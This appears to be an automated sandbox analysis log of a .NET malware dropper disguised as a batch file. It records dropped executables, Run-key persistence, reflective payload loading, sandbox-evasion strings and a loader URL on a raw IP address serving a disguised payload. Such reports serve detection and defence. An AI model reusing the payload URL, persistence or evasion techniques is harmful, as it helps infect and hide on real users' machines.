Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\Temp\Wthdlxoyqvnqsfcfiinf.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Roaming\note\pdf.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Windows\SysWOW64\WerFault.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\fireless.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Windows\SysWOW64\WerFault.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5276
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5252:120:WilError_01
Source: BPL_1000572_007.bat.exe, 00000000.00000002.476692694.0000000003969000.00000004.00000800.00020000.00000000.sdmp, BPL_1000572_007.bat.exe, 00000000.00000002.478754600.0000000003A55000.00000004.00000800.00020000.00000000.sdmp, BPL_1000572_007.bat.exe, 00000000.00000002.477582382.00000000039C1000.00000004.00000800.00020000.00000000.sdmp, BPL_1000572_007.bat.exe, 00000000.00000002.452043304.0000000002A97000.00000004.00000800.00020000.00000000.sdmp, BPL_1000572_007.bat.exe, 0000000D.00000000.435627430.0000000000401000.00000040.00000400.00020000.00000000.sdmp | Binary or memory string: C*\AC:\Users\Dell\AppData\Roaming\Microsoft\Windows\Templates\Stub\Project1sqlite.vbpL;@"
Source: BPL_1000572_007.bat.exe, 0000000D.00000002.572590834.0000000000439000.00000040.00000400.00020000.00000000.sdmp | Binary or memory string: @@*\AC:\Users\Dell\AppData\Roaming\Microsoft\Windows\Templates\Stub\Project1sqlite.vbp
Source: BPL_1000572_007.bat.exe | String found in binary or memory: Maggopfhjwohttp://185.252.178.63/loader/uploads/Arwiw_Xnqfdlpv.pngP/r/ d/_CorExeMainmscoree.dll
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: BPL_1000572_007.bat.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: BPL_1000572_007.bat.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: .pdb= source: Wthdlxoyqvnqsfcfiinf.exe, 0000000C.00000000.472966174.0000000000AF8000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: System.Core.ni.pdbRSDSD source: WER8A92.tmp.dmp.21.dr
Source: Binary string: System.Xml.ni.pdb source: WER8A92.tmp.dmp.21.dr
Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net40/Newtonsoft.Json.pdb source: BPL_1000572_007.bat.exe, BPL_1000572_007.bat.exe, 00000000.00000002.569431471.0000000009610000.00000004.08000000.00040000.00000000.sdmp, BPL_1000572_007.bat.exe, 00000000.00000003.427308507.0000000009E53000.00000004.00000800.00020000.00000000.sdmp, BPL_1000572_007.bat.exe, 00000000.00000002.567987609.0000000009484000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000011.00000002.592176698.00000000032FD000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000014.00000002.591358526.0000000002ABD000.00000004.00000800.00020000.00000000.sdmp, fireless.exe, 00000016.00000002.591087529.000000000345D000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: System.ni.pdbRSDS source: WER8A92.tmp.dmp.21.dr
Source: Binary string: System.Core.pdb\ source: WER8A92.tmp.dmp.21.dr
Source: Binary string: System.Configuration.pdbj source: WER8A92.tmp.dmp.21.dr
Source: Binary string: System.Configuration.ni.pdb source: WER8A92.tmp.dmp.21.dr
Source: Binary string: mscorlib.ni.pdbRSDS source: WER8A92.tmp.dmp.21.dr
Source: Binary string: System.Configuration.pdb source: WER8A92.tmp.dmp.21.dr
Source: Binary string: System.Xml.pdb source: WER8A92.tmp.dmp.21.dr
Source: Binary string: System.pdb source: WER8A92.tmp.dmp.21.dr
Source: Binary string: System.Core.ni.pdb source: WER8A92.tmp.dmp.21.dr
Source: Binary string: mscorlib.pdb source: WER8A92.tmp.dmp.21.dr
Source: Binary string: C:\Users\user\AppData\Local\Temp\Wthdlxoyqvnqsfcfiinf.PDBL source: Wthdlxoyqvnqsfcfiinf.exe, 0000000C.00000000.472966174.0000000000AF8000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: mscorlib.ni.pdb source: WER8A92.tmp.dmp.21.dr
Source: Binary string: System.Configuration.ni.pdbRSDSO* source: WER8A92.tmp.dmp.21.dr
Source: Binary string: System.Core.pdb source: WER8A92.tmp.dmp.21.dr
Source: Binary string: System.pdb4: source: WER8A92.tmp.dmp.21.dr
Source: Binary string: Wthdlxoyqvnqsfcfiinf.PDB source: Wthdlxoyqvnqsfcfiinf.exe, 0000000C.00000000.472966174.0000000000AF8000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net40/Newtonsoft.Json.pdbSHA256w^ source: BPL_1000572_007.bat.exe, 00000000.00000002.569431471.0000000009610000.00000004.08000000.00040000.00000000.sdmp, BPL_1000572_007.bat.exe, 00000000.00000003.427308507.0000000009E53000.00000004.00000800.00020000.00000000.sdmp, BPL_1000572_007.bat.exe, 00000000.00000002.567987609.0000000009484000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000011.00000002.592176698.00000000032FD000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000014.00000002.591358526.0000000002ABD000.00000004.00000800.00020000.00000000.sdmp, fireless.exe, 00000016.00000002.591087529.000000000345D000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Wthdlxoyqvnqsfcfiinf.PDB source: Wthdlxoyqvnqsfcfiinf.exe, 0000000C.00000000.472966174.0000000000AF8000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: System.Xml.ni.pdbRSDS source: WER8A92.tmp.dmp.21.dr
Source: Binary string: System.ni.pdb source: WER8A92.tmp.dmp.21.dr

Data Obfuscation

Source: Yara match | File source: 0.2.BPL_1000572_007.bat.exe.486cee0.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.BPL_1000572_007.bat.exe.486cee0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.BPL_1000572_007.bat.exe.cce0000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.BPL_1000572_007.bat.exe.cce0000.9.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.571147253.000000000CCE0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000014.00000002.590614103.0000000002A7E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.448721724.000000000298E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000016.00000002.597986476.00000000035FF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000016.00000002.590549636.0000000003428000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000016.00000002.591002736.0000000003454000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.539813510.000000000448F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000014.00000002.591295608.0000000002AB4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000011.00000002.592125246.00000000032F4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000016.00000002.591087529.000000000345D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000014.00000002.598264553.0000000002C65000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000011.00000002.598968323.00000000034A4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000014.00000002.591358526.0000000002ABD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000011.00000002.592176698.00000000032FD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.460105913.0000000002B6D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: BPL_1000572_007.bat.exe PID: 5820, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: pdf.exe PID: 3712, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: pdf.exe PID: 3536, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: fireless.exe PID: 1420, type: MEMORYSTR
Source: BPL_1000572_007.bat.exe, u0003.cs | .Net Code: \x02 System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: Wthdlxoyqvnqsfcfiinf.exe.0.dr, yjyog.cs | .Net Code: idenr System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: pdf.exe.0.dr, u0003.cs | .Net Code: \x02 System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 0.0.BPL_1000572_007.bat.exe.5b0000.0.unpack, u0003.cs | .Net Code: \x02 System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 12.0.Wthdlxoyqvnqsfcfiinf.exe.6d0000.0.unpack, yjyog.cs | .Net Code: idenr System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: fireless.exe.13.dr, u0003.cs | .Net Code: \x02 System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe | Code function: 0_2_02752318 pushfd ; iretd
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe | Code function: 0_2_02752020 push esp; iretd
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe | Code function: 0_2_02752304 push esp; iretd
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe | Code function: 0_2_027527BA pushfd ; iretd
Source: C:\Users\user\AppData\Roaming\note\pdf.exe | Code function: 17_2_0301EEC1 push FFFFFF8Bh; iretd
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe | File created: C:\Users\user\AppData\Roaming\note\pdf.exe
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\fireless.exe
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe | File created: C:\Users\user\AppData\Local\Temp\Wthdlxoyqvnqsfcfiinf.exe

Boot Survival

Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe | Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run pdf
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe | Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce quislingistic
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Wthdlxoyqvnqsfcfiinf.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Wthdlxoyqvnqsfcfiinf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\note\pdf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\note\pdf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\note\pdf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\note\pdf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\note\pdf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\note\pdf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\note\pdf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\note\pdf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\note\pdf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\note\pdf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\note\pdf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\note\pdf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\note\pdf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\note\pdf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\note\pdf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\note\pdf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\note\pdf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\note\pdf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\note\pdf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\note\pdf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\note\pdf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\note\pdf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\note\pdf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\note\pdf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\note\pdf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\note\pdf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\note\pdf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\note\pdf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\note\pdf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\note\pdf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\note\pdf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\note\pdf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\note\pdf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\note\pdf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\note\pdf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\note\pdf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\note\pdf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\note\pdf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\note\pdf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\note\pdf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\note\pdf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\note\pdf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\note\pdf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\note\pdf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\note\pdf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\note\pdf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\note\pdf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\note\pdf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\note\pdf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\note\pdf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\note\pdf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\note\pdf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\note\pdf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\note\pdf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\note\pdf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\note\pdf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\note\pdf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\note\pdf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\note\pdf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\note\pdf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\note\pdf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\note\pdf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\note\pdf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\note\pdf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\fireless.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\fireless.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\fireless.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\fireless.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\fireless.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\fireless.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\fireless.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\fireless.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\fireless.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\fireless.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\fireless.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\fireless.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\fireless.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\fireless.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\fireless.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\fireless.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\fireless.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\fireless.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\fireless.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\fireless.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\fireless.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\fireless.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\fireless.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\fireless.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\fireless.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\fireless.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\fireless.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\fireless.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\fireless.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\fireless.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\fireless.exeProcess information set: NOOPENFILEERRORBOX

                  Malware Analysis System Evasion

                  barindex
                  Source: BPL_1000572_007.bat.exe, 00000000.00000002.448721724.000000000298E000.00000004.00000800.00020000.00000000.sdmp, BPL_1000572_007.bat.exe, 00000000.00000002.460105913.0000000002B6D000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000011.00000002.592176698.00000000032FD000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000014.00000002.591358526.0000000002ABD000.00000004.00000800.00020000.00000000.sdmp, fireless.exe, 00000016.00000002.591087529.000000000345D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                  Source: BPL_1000572_007.bat.exe, 00000000.00000002.460105913.0000000002B6D000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000011.00000002.598968323.00000000034A4000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000011.00000002.592125246.00000000032F4000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000011.00000002.592176698.00000000032FD000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000011.00000002.592077345.00000000032DF000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000014.00000002.598264553.0000000002C65000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000014.00000002.590614103.0000000002A7E000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000014.00000002.591295608.0000000002AB4000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000014.00000002.591358526.0000000002ABD000.00000004.00000800.00020000.00000000.sdmp, fireless.exe, 00000016.00000002.597986476.00000000035FF000.00000004.00000800.00020000.00000000.sdmp, fireless.exe, 00000016.00000002.591087529.000000000345D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLLJ(REMOTETHREADSUSPENDED) [-] NTPROTECTVIRTUALMEMORY, PAGE_EXECUTE_READ: {0}ESOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\USER SHELL FOLDERS/(REMOTETHREADSUSPENDED) [-] NTRESUMETHREAD: {0}
                  Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_LogicalDisk
                  Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe TID: 868Thread sleep time: -30000s >= -30000s
                  Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe TID: 3028Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6128Thread sleep time: -7378697629483816s >= -30000s
                  Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9552
